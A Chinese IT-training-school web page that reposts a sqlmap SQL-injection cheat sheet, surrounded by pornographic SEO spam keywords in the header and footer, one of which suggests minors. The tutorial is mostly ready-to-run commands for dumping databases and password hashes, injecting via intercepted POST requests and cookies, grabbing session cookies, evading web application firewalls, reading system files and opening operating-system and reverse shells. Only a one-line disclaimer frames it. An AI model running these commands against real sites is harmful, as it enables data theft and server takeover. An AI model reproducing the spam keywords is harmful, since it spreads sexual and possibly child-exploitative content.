亚洲AV无码国产精品午友情链接,五月丁香在线视频,欧美日韩人妻,曰本大码熟中文字幕

鄭州信息科技中專職業(yè)學(xué)院中專部

不僅僅統(tǒng)招學(xué)歷喲

  • 熱門專業(yè)!
  • 大學(xué)校園!
  • 就業(yè)保障!
  • 拿學(xué)歷又能高薪就業(yè),誰(shuí)能不愛(ài)!
了解詳情>
鄭州北大青鳥翔天信鴿參加“安心學(xué)習(xí)·放心就業(yè)”公約簽約儀式

讓每一個(gè)家庭“安心”、“放心”

  • 教學(xué)為本
  • 師愛(ài)為魂
  • 安心學(xué)習(xí)
  • 放心就業(yè)
了解詳情>
北大青鳥20周年慶典與總部年會(huì)鄭州翔天信鴿榮獲7項(xiàng)榮譽(yù)

深耕細(xì)作IT職業(yè)教育15載

  • 青鳥之星教學(xué)質(zhì)量大獎(jiǎng)
  • 卓越風(fēng)云人物
  • 北大青鳥中心理事會(huì)成員
  • 七項(xiàng)榮耀載譽(yù)而行!
了解詳情>
鄭州北大青鳥學(xué)員喜獲全國(guó)IT精英挑戰(zhàn)賽冠軍

我們教學(xué)怎么樣

  • 實(shí)力見(jiàn)證
  • 網(wǎng)絡(luò)組一等獎(jiǎng)
  • 網(wǎng)絡(luò)組二等獎(jiǎng)
  • 軟件組四等獎(jiǎng)
  • 200家校區(qū)脫穎而出!
了解更多>
北大青鳥榮獲315重承諾守信用放心品牌

北大青鳥職業(yè)IT20周年

  • 重承諾
  • 守信用
  • 放心品牌
  • 放心學(xué)習(xí)
  • 靠靠譜譜好就業(yè)!
了解更多>
學(xué)IT好工作高薪就業(yè)

我命由我不由天

  • 學(xué)個(gè)性的技術(shù)
  • 做愛(ài)做的事
  • 掙滿意的錢
  • 衣食無(wú)憂
  • 選擇寬且高大尚!
了解更多>
鄭州北大青鳥IT培訓(xùn)辦學(xué)14年

我們靠不靠譜

  • 14年辦學(xué)
  • 14年磨練
  • 14年成長(zhǎng)
  • 14年探索
  • 只為讓每個(gè)學(xué)員成材!
了解更多>
鄭州北大青鳥IT培訓(xùn)

不打工也牛掰

  • 好工作
  • 好環(huán)境
  • 高薪資
  • 好課程
  • 支持你成為有“錢”人!
了解更多>

學(xué)IT就讀北大青鳥

  • 好工作
  • 好未來(lái)
  • 好老師
  • 好課程
  • 支持你成為受人尊敬的人!
了解更多>
一步一步解讀sqlmap是如何操作的
作者:北大青鳥 添加時(shí)間:06-06 瀏覽次數(shù):0

 1. 基礎(chǔ)用法:

./sqlmap.py -u “注入地址” -v 1 –dbs   // 列舉數(shù)據(jù)庫(kù)
./sqlmap.py -u “注入地址” -v 1 –current-db   // 當(dāng)前數(shù)據(jù)庫(kù)
./sqlmap.py -u “注入地址” -v 1 –users    // 列數(shù)據(jù)庫(kù)用戶
./sqlmap.py -u “注入地址” -v 1 –current-user  // 當(dāng)前用戶
./sqlmap.py -u “注入地址” -v 1 –tables -D “數(shù)據(jù)庫(kù)”   // 列舉數(shù)據(jù)庫(kù)的表名
./sqlmap.py -u “注入地址” -v 1 –columns -T “表名” -D “數(shù)據(jù)庫(kù)”   // 獲取表的列名
./sqlmap.py -u “注入地址” -v 1 –dump -C “字段,字段” -T “表名” -D “數(shù)據(jù)庫(kù)”   // 獲取表中的數(shù)據(jù),包含列
已經(jīng)開始拖庫(kù)了,SQLMAP是非常人性化的,它會(huì)將獲取的數(shù)據(jù)存儲(chǔ)sqlmap/output/中、、、

2. sqlmap post注入
我們?cè)谑褂肧qlmap進(jìn)行post型注入時(shí),
經(jīng)常會(huì)出現(xiàn)請(qǐng)求遺漏導(dǎo)致注入失敗的情況。
這里分享一個(gè)小技巧,即結(jié)合burpsuite來(lái)使用sqlmap,
用這種方法進(jìn)行post注入測(cè)試會(huì)更準(zhǔn)確,操作起來(lái)也非常容易。
1. 瀏覽器打開目標(biāo)地址http:// www,2cto,com /Login.asp
2. 配置burp代理(127.0.0.1:8080)以攔截請(qǐng)求
3. 點(diǎn)擊login表單的submit按鈕
4. 如下圖,這時(shí)候Burp會(huì)攔截到了我們的登錄POST請(qǐng)求
5. 把這個(gè)post請(qǐng)求復(fù)制為txt, 我這命名為search-test.txt 然后把它放至sqlmap目錄下
6. 運(yùn)行sqlmap并使用如下命令:
./sqlmap.py -r search-test.txt -p tfUPass
這里參數(shù)-r 是讓sqlmap加載我們的post請(qǐng)求rsearch-test.txt,
而-p 大家應(yīng)該比較熟悉,指定注入用的參數(shù)。
3,sqlmap  cookies注入
sqlmap.py -u “http://127.0.0.1/base.php” –cookies “id=1″  –dbs –level 2
2. 默認(rèn)情況下SQLMAP只支持GET/POST參數(shù)的注入測(cè)試,但是當(dāng)使用–level 參數(shù)且數(shù)值>=2的時(shí)候也會(huì)檢查cookie時(shí)面的參數(shù),當(dāng)>=3的時(shí)候?qū)z查User-agent和Referer,那么這就很簡(jiǎn)單了,我 們直接在原有的基礎(chǔ)上面加上 –level 2 即可
利用sqlmap cookies注入突破用戶登錄繼續(xù)注入
先把用戶登陸的cookie拿到吧,
在收藏夾添加一個(gè)鏈接cookies屬性:
名字自己取
javascript:alert(document.cookie),,需要獲取當(dāng)前cookie的時(shí)候,
直接點(diǎn)一下這個(gè)鏈接,然后復(fù)制一下彈出對(duì)話框
里的cookie值就搞定了
sqlmap.py -u http://x.x.x.x/Down.aspx?tid=2 -p tid –dbms mssql –cookie=”info=username=test”
-p是指指定參數(shù)注入
4. sqlmap遇到url重寫的注入
哪里存在注入就加上 * 號(hào)
1
./sqlmap.py -u “http://www,cunlide,com/id1/1*/id2/2“
5.sqlmap 編碼繞waf注入
./sqlmap.py -u http://127.0.0.1/test.php?id=1 -v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
在sqlmap 的 tamper目錄下有很多space2morehash.py 編碼腳本自行加載
 其他基礎(chǔ):
sqlmap -u “http://url/news?id=1” –level=3 –smart –dbms “Mysql” –current-user #獲取當(dāng)前用戶名稱
sqlmap -u “http://www.xxoo.com/news?id=1” –level=3 –smart –dbms “Mysql” –current-db  #獲取當(dāng)前數(shù)據(jù)庫(kù)名稱
sqlmap -u “http://www.xxoo.com/news?id=1” –level=3 –smart –dbms “Mysql”–tables  -D “db_name” #列表名
sqlmap -u “http://url/news?id=1” –level=3 –smart  –dbms “Mysql” –columns -T “tablename” users-D “db_name” -v 0 #列字段
sqlmap -u “http://url/news?id=1” –level=3 –smart –dbms “Mysql”  –dump  -C “column_name”  -T “table_name” -D “db_name” -v 0   #獲取字段內(nèi)容
 
******************信息獲取******************
sqlmap -u “ –smart –dbms “Mysql” –users  #列數(shù)據(jù)庫(kù)用戶  sqlmap -u “ –smart –dbms “Mysql” –dbs#列數(shù)據(jù)庫(kù)  sqlmap -u “ –smart –dbms “Mysql”–passwords #數(shù)據(jù)庫(kù)用戶密碼  sqlmap -u “ –smart –dbms “Mysql”–passwords-U root  -v 0 #列出指定用戶數(shù)據(jù)庫(kù)密碼  sqlmap -u “ –smart –dbms “Mysql” –dump-all -v 0 #列出所有數(shù)據(jù)庫(kù)所有表   
sqlmap -u “ –smart –dbms “Mysql”–privileges #查看權(quán)限  sqlmap -u “ –smart –dbms “Mysql”–privileges -U root #查看指定用戶權(quán)限  sqlmap -u “ –smart –dbms “Mysql” –is-dba -v 1 #是否是數(shù)據(jù)庫(kù)管理員  sqlmap -u “ –smart –dbms “Mysql” –roles #枚舉數(shù)據(jù)庫(kù)用戶角色  sqlmap -u “ –smart –dbms “Mysql”–udf-inject #導(dǎo)入用戶自定義函數(shù)(獲取系統(tǒng)權(quán)限。  
sqlmap -u “ –smart –dbms “Mysql”–dump-all –exclude-sysdbs -v 0 #列出當(dāng)前庫(kù)所有表  
sqlmap -u “ –smart –dbms “Mysql” –union-check #是否支持union 注入  sqlmap -u “ –smart –dbms “Mysql”–union-cols #union 查詢表記錄  sqlmap -u “ –smart –dbms “Mysql” –union-test #union 語(yǔ)句測(cè)試  
sqlmap -u “ –smart –dbms “Mysql” –union-use –banner #采用union 注入  sqlmap -u “ –smart –dbms “Mysql”–union-test –union-tech orderby #union 配合 order by  
sqlmap -u “ –smart –dbms “Mysql”–method “POST” — data “id=1&cat=2″ #post注入  sqlmap -u “ –smart –dbms “Mysql”–cookie “COOKIE_VALUE” #cookie注入  
sqlmap -u “ –smart –dbms “Mysql”-b #獲取banner信息 
sqlmap -u “http://url/news?id=1” –level=3 –smart-v 1 -f #指紋判別數(shù)據(jù)庫(kù)類型
sqlmap -u “http://url/news?id=1” –level=3 –smart–proxy”http://127.0.0.1:8118” #代理注入
sqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE“  #指定關(guān)鍵詞
sqlmap -u “ –smart –dbms “Mysql”–sql-shell #執(zhí)行指定sql命令  
sqlmap -u “ –smart –dbms “Mysql”–file /etc/passwd  sqlmap -u “ –smart –dbms “Mysql”–os-cmd=whoami #執(zhí)行系統(tǒng)命令  sqlmap -u “ –smart –dbms “Mysql”–os-shell #系統(tǒng)交互shell  sqlmap -u “ –smart –dbms “Mysql”–os-pwn #反彈shell  sqlmap -u “ –smart –dbms “Mysql”–reg-read #讀取win系統(tǒng)注冊(cè)表  sqlmap -u “ –smart –dbms “Mysql” –dbs-o “sqlmap.log” #保存進(jìn)度  sqlmap -u “ –smart –dbms “Mysql” –dbs  -o “sqlmap.log” –resume  #恢復(fù)已保存進(jìn)度 
文章來(lái)自于網(wǎng)絡(luò),請(qǐng)勿用于非法途徑,僅提供參考!

本文由站河南北大青鳥校區(qū)整編而成,如需了解更多IT資訊類的文章、新聞、課程和學(xué)習(xí)技巧、就業(yè)案例、招生詳情等問(wèn)題,可以對(duì)在線咨詢老師進(jìn)行一對(duì)一問(wèn)答!


分享到:
天天无码在线| 亚洲日本视频图片小说| 天美传媒av| 精品老六久| 亚洲欧美日韩香港区| 日韩精品少妇无码受不了| 综合激情图区| 无码精品一区二区在线| www亚洲欧美| 亚洲欧美在线人成| 国产午夜免费啪啪啪| 国产精品三级AV| 国产精品久久免费电影| 综合免费一区二区| www.插插插插| 偷拍四虎丁香射精| 黄片毛片久久| 亚洲电影成人| 国产精品已拍| 久久久人妻一区二区| 久久久久无码精品国产一区二区 | 怡红影院| 四虎在线永久影院| www精品成人免费| 国产乱伦视频| 国产免费九九热视频| 鳩鸠丁香五月| 关于未知的我们| AV日韩无码爱爱爱爱| 男男同志| 一级无码影片免费观看| 亚洲人妻偷拍| 五月丁香开心综合| 久久久久人妻一区精品果冻| 最新中文字幕久久| 中文字幕永久无码| 国产中文区4幕区2021| 二级黄片一区二区三区| 欧美幼呦| 热九九一本热| 黄色网站三级片网站|